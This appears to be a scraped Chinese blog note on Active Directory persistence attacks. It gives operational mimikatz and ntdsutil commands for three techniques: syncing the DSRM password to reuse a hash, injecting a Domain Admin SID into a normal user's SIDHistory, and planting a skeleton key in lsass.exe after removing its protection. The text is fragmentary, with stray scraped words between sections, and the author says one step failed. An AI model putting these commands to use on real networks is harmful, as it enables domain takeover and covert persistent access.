每次修改都须要重置dsrm密码,本质上dsrm和administrator是一个帐户。充值后,administrator的NTLMhash将变成你所掌握的帐号的hash值,能够进行PtHsass
ntdsutil set dsrm password 重置 DSRM 管理员密码:sync from domain account ACCOUNTNAME
证实hash值同样
dom
DomainA中的常规用户账户能够包含DomainA 的SID,若是DomainA 的SID用于特权账户或组,就能够授予常规用户账户域管理员权限,而不须要成为域管理员组的成员。debug
PS>Get-AdUser -Properties SIDHistory,memberof mimikatz#privilege::debug mimikatz#sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]
如此便可使得CommonUserNAME具有DomainAdmins的SIDHistory,从而具有了权限,个人实验环境的确没有办法搞定最后一步,说是缺乏权限,继续研究中ing
3d
给域内全部帐户增长一个密码,统一的,每个域内帐户均可以按照这个密码进行认证,其原理是对lsass.exe进行注入,因此重启后会失效code
#没有lsass.exe保护的 mimikatz#privilege::debug mimikatz#misc::skeleton #有lsass.exe保护的 """ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 新建-DWORD值,名称为RunAsPPL,数值为00000001就能够保护 """ mimikatz#!+ mimikatz#!processprotect /process:lsass.exe /remove mimikatz#misc::skeleton
默认的密码是mimikatz
blog